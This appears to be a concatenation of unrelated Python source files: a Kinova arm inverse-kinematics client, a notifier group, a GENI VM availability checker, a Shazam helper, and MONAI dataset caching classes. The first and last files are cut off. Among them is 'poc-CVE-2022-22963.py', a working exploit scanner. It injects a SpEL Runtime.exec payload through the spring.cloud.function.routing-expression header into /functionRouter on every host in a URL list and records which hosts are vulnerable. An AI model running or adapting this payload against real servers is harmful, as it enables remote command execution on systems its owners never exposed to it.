compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
print("GOOOOOOOOOOOOOOOOOOOOOOOO")
goal_stamped = geometry_msgs.msg.PoseStamped()
goal_stamped.header = std_msgs.msg.Header(frame_id=("j2s7s300_" + 'link_base'))
goal_stamped.pose.position = geometry_msgs.msg.Point(
x=displacement[0], y=displacement[1], z=displacement[2])
goal_stamped.pose.orientation = geometry_msgs.msg.Quaternion(
x=displacement[3], y=displacement[4], z=displacement[5])
msgs_request = moveit_msgs.msg.PositionIKRequest()
msgs_request.group_name = "arm"
msgs_request.pose_stamped = goal_stamped
msgs_request.robot_state.is_diff = True
msgs_request.timeout.secs = 2
msgs_request.avoid_collisions = True
msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
"j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
# msgs_request.robot_state = self.robot.get_current_state()
try:
jointAngle=compute_ik(msgs_request)
ans=list(jointAngle.solution.joint_state.position)[2:9]
ans = simplify_joints(ans)
print(jointAngle)
if jointAngle.error_code.val == -31:
print('No IK solution')
return -31
if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
print("Goal or current position is in collision")
return -12
except rospy.ServiceException as e:
print("Service call failed: %s"%e)
try:
publishCatesianVelocityCommands(command, duration)
return 1
except Exception as e:
print(e)
return -1
else:
cart_thread = threading.Thread(target=publishCatesianVelocityCommands, args=(command, duration, "j2s7s300_",))
if collision_check is False:
try:
cart_thread.start()
time.sleep(duration_timeout)
return 1
except:
return -1
else:
curr_pose = rospy.wait_for_message("/j2s7s300_driver/out/tool_pose", PoseStamped)
curr_pose = np.array([curr_pose.pose.position.x, curr_pose.pose.position.y, curr_pose.pose.position.z, \
curr_pose.pose.orientation.x, curr_pose.pose.orientation.y, curr_pose.pose.orientation.z])
displacement = curr_pose + duration*np.array(command)
rospy.wait_for_service('compute_ik')
compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
goal_stamped = geometry_msgs.msg.PoseStamped()
goal_stamped.header = std_msgs.msg.Header(frame_id=("j2s7s300_" + 'link_base'))
goal_stamped.pose.position = geometry_msgs.msg.Point(
x=displacement[0], y=displacement[1], z=displacement[2])
goal_stamped.pose.orientation = geometry_msgs.msg.Quaternion(
x=displacement[3], y=displacement[4], z=displacement[5], w=0.0)
msgs_request = moveit_msgs.msg.PositionIKRequest()
msgs_request.group_name = "arm"
msgs_request.pose_stamped = goal_stamped
msgs_request.robot_state.is_diff = True
msgs_request.timeout.secs = 2
msgs_request.avoid_collisions = True
msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
"j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
# msgs_request.robot_state = self.robot.get_current_state()
try:
jointAngle=compute_ik(msgs_request)
ans=list(jointAngle.solution.joint_state.position)[2:9]
ans = simplify_joints(ans)
if jointAngle.error_code.val == -31:
print('No IK solution')
return -31
if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
print("Goal or current position is in collision")
return -12
except rospy.ServiceException as e:
print("Service call failed: %s"%e)
try:
cart_thread.start()
time.sleep(duration_timeout)
return 1
except:
return -1
def simplify_angle(angle):
# Very simple function that makes sure the angles are between -pi and pi
if angle > math.pi:
while angle > math.pi:
angle -= 2*math.pi
elif angle < -math.pi:
while angle < -math.pi:
angle += 2*math.pi
return angle
def simplify_joints(joints, group_id=0):
# Helper function to convert a dictionary of joint values
if isinstance(joints, dict):
simplified_joints = dict()
for joint in joints:
# Pull out the name of the joint
joint_name = '_'.join(joint.split('_')[1::])
simplified_joints[joint] = simplify_angle(joints[joint])
elif isinstance(joints, list):
simplified_joints = []
#separate the joint name from the group name
joint_order = map(lambda s: "_".join(s.split("_")[1::]),
["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
"j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"])
continuous_joint_indices = [joint_order.index(j) for j in ["joint_1", "joint_2", "joint_3", "joint_4",
"joint_5", "joint_6", "joint_7"]]
for i in range(len(joints)):
a = joints[i]
if i in continuous_joint_indices:
simplified_joints.append(simplify_angle(a))
else:
simplified_joints.append(a)
else:
rospy.logerr("Joints must be provided as a list or dictionary")
raise TypeError("Joints must be provided as a list or dictionary")
return simplified_joints
if __name__ == '__main__':
#args = argumentParser(None)
kinova_robotTypeParser("j2s7s300")
rospy.init_node(prefix + 'pose_action_client')
getcurrentCartesianCommand(prefix)
|
notifier_group.py | import threading
class NotifierGroup(object):
def __init__(self, logger):
self._logger = logger
self._notifiers = {}
def add_notifier(self, name, notifier):
self._notifiers[name] = notifier
def get_notifiers(self, limit=[]):
if limit:
limit = filter(lambda x: x in self._notifiers.keys(), limit)
return { key: self._notifiers[key] for key in limit }.values()
else:
return self._notifiers.values()
def notify(self, title, message, retry_forever=False, limit=[]):
for notifier in self.get_notifiers(limit):
if retry_forever:
# These notifications could go on forever and never actually trigger, so it's
# important that they each run in their own thread. This at least gives some of
# the notifiers a chance to succeed.
# This isn't necessary when not retrying forever, as notifiers should always
# time out after three failed attempts.
notifier_thread = threading.Thread(target=self._notify, args=(notifier, title, message, retry_forever), daemon=True)
notifier_thread.start()
else:
self._notify(notifier, title, message, retry_forever)
def _notify(self, notifier, title, message, retry_forever):
try:
notifier.notify(title, message, retry_forever)
except BaseException as e:
self._logger.warn("Fatal error while running {0} notifier: {1}".format(notifier.__class__.__name__, e))
|
checkvmavail.py | # Copyright (c) 2014 Barnstormer Softworks, Ltd.
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import multiprocessing as MP
import time
import geni.aggregate.instageni as IG
import geni.util
context = geni.util.loadContext(key_passphrase = True)
OVERLOAD = 43
def query_aggregate (context, site, q):
try:
res = []
ad = site.listresources(context)
for node in ad.nodes:
if not node.exclusive:
try:
if "emulab-xen" in node.sliver_types:
res.append((node.component_id, node.hardware_types["pcvm"], "Xen"))
else:
res.append((node.component_id, node.hardware_types["pcvm"], "OpenVZ"))
except:
continue
q.put((site.name, res))
except Exception:
q.put((site.name, ["OFFLINE"]))
def do_parallel ():
q = MP.Queue()
for site in IG.aggregates():
p = MP.Process(target=query_aggregate, args=(context, site, q))
p.start()
while MP.active_children():
time.sleep(0.5)
l = []
while not q.empty():
l.append(q.get())
xen_used = xen_avail = xen_total = 0
vz_avail = vz_total = 0
overload_cids = []
underload_cids = []
for idx,pair in enumerate(l):
site_vz = site_xen = 0
entries = []
(site_name, res) = pair
try:
for (cid, count, typ) in res:
if typ == "Xen":
used = 57 - int(count)
site_xen += used
if used >= OVERLOAD:
overload_cids.append((cid, used))
else:
underload_cids.append((cid, used))
xen_avail += int(count)
xen_used += used
xen_total += 57
elif typ == "OpenVZ":
site_vz += 100 - int(count)
vz_avail += int(count)
vz_total += 100
entries.append(" [%s] %s/57 (%s)" % (cid, count, typ))
except Exception:
print res
print "%02d %s (Used: %d Xen, %d OpenVZ)" % (idx+1, site_name, site_xen, site_vz)
for entry in entries:
print entry
print "Used"
print "----"
print "OpenVZ: %d/%d" % (vz_avail, vz_total)
print "Xen: %d/%d" % (xen_used, xen_total)
print
print "Overloaded hosts: %d" % (len(overload_cids))
print "Underloaded hosts: %d" % (len(underload_cids))
for cid,used in overload_cids:
print "%02d - %s" % (used, cid)
if __name__ == '__main__':
do_parallel()
|
shazi.py | #shazi.py
from ShazamAPI import Shazam
from threading import Thread
import traceback
from pydub import AudioSegment
import time
# class Shazi(object):
'''
None-blocking function to get title, artist, and other shazam data from a file
'''
def shazam(mp3path, outDict = None, checkFull = False):
if outDict is None:
outDict = {"out":None}
sT = Thread(target=shazamAsync,args=[[mp3path, outDict, checkFull]])
sT.start()
return outDict
def shazamAsync(data, round = 0):
print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
t = time.time()
try:
mp3path, outDict, checkFull = data
if checkFull:
mp3_file_content_to_recognize = open(mp3path, 'rb').read()
else:
audio = AudioSegment.from_mp3(mp3path)
mp3_file_content_to_recognize = audio.export(format="mp3").read()
start = 0
seconds = 1.2
length = len(audio)
if length > 0:
if length > seconds:
seconds = seconds
else:
seconds = length/1000
mp3_file_content_to_recognize = mp3_file_content_to_recognize[start*60*1000:int((start+seconds)*60*1000)]
# shazam = Shazam(mp3_file_content_to_recognize)
outDict["out"] = next(Shazam(mp3_file_content_to_recognize).recognizeSong())
# recognize_generator = shazam.recognizeSong()
# outDict["out"] = next(recognize_generator)
if outDict is not None:
firstRes = None
try:
print(firstRes)
firstRes = outDict["out"][1]["track"]
except:
print("EEEEE SHAZAM COULD NOT FIND SONG")
traceback.print_exc()
if firstRes is not None and "title" in firstRes and "subtitle" in firstRes:
outDict["title"] = firstRes["title"]
outDict["artist"] = firstRes["subtitle"]
print(outDict["title"] + " - " + outDict["artist"])
print('''%%%%%%%%%%% DONE! %%%%%%%%%%%''', "time",time.time()-t)
# while True:
# print(next(recognize_generator)) # current offset & shazam response to recognize requests1
except:
traceback.print_exc()
|
poc-CVE-2022-22963.py | import requests
import sys
import threading
import urllib3
urllib3.disable_warnings()
def scan(txt,cmd):
payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")'
data ='test'
headers = {
'spring.cloud.function.routing-expression':payload,
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
path = '/functionRouter'
f = open(txt)
urllist=f.readlines()
for url in urllist :
url = url.strip('\n')
all = url + path
try:
req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3)
code =req.status_code
text = req.text
rsp = '"error":"Internal Server Error"'
if code == 500 and rsp in text:
print ( f'[+] { url } is vulnerable' )
poc_file = open('vulnerable.txt', 'a+')
poc_file.write(url + '\n')
poc_file.close()
else:
print ( f'[-] { url } not vulnerable' )
except requests.exceptions.RequestException:
print ( f'[-] { url } detection timed out' )
continue
except:
print ( f'[-] { url } error' )
continue
if __name__ == '__main__' :
try:
cmd1 =sys.argv[1]
t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) )
t.start()
except:
print ( 'Usage:' )
print('python poc.py url.txt')
pass
|
dataset.py | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import pickle
import sys
import threading
import time
import warnings
from copy import deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import TYPE_CHECKING, Any, Callable, List, Optional, Sequence, Union
import torch
from torch.utils.data import Dataset as _TorchDataset
from monai.data.utils import pickle_hashing
from monai.transforms import Compose, Randomizable, Transform, apply_transform
from monai.transforms.transform import RandomizableTransform
from monai.utils import MAX_SEED, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int):
data = self.data[index]
if self.transform is not None:
data = apply_transform(self.transform, data)
return data
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
Note:
The input data must be a list of file paths and will hash them as cache keys.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]] = None,
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
# execute all the deterministic transforms
if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
break
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, RandomizableTransform)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
return torch.load(hashfile)
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to ".temp_write_cache" and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
temp_hash_file = hashfile.with_suffix(".temp_write_cache")
torch.save(_item_transformed, temp_hash_file)
temp_hash_file.rename(hashfile)
return _item_transformed
def __getitem__(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]] = None,
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
self._read_env = None
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def _fill_cache_start_reader(self):
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if self.progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
for item in tqdm(self.data) if has_tqdm and self.progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with env.begin(write=True) as txn:
with txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(f"Resizing the cache database from {int(size) >> 20}MB to {int(new_size) >> 20}MB.")
env.set_mapsize(new_size)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
To improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
# execute all the deterministic transforms
if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
break
item = apply_transform(_transform, item)
return item
def __getitem__(self, index):
if index >= self.cache_num:
# no cache for this index, execute all the transforms directly
return super(CacheDataset, self).__getitem__(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
start_run = True
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
Note:
This replacement will not work if setting the `multiprocessing_context` of DataLoader to `spawn`
or on windows(the default multiprocessing method is `spawn`) and setting `num_workers` greater than 0.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
"""
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn("cache_num is greater or equal than dataset length, fall back to regular CacheDataset.")
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
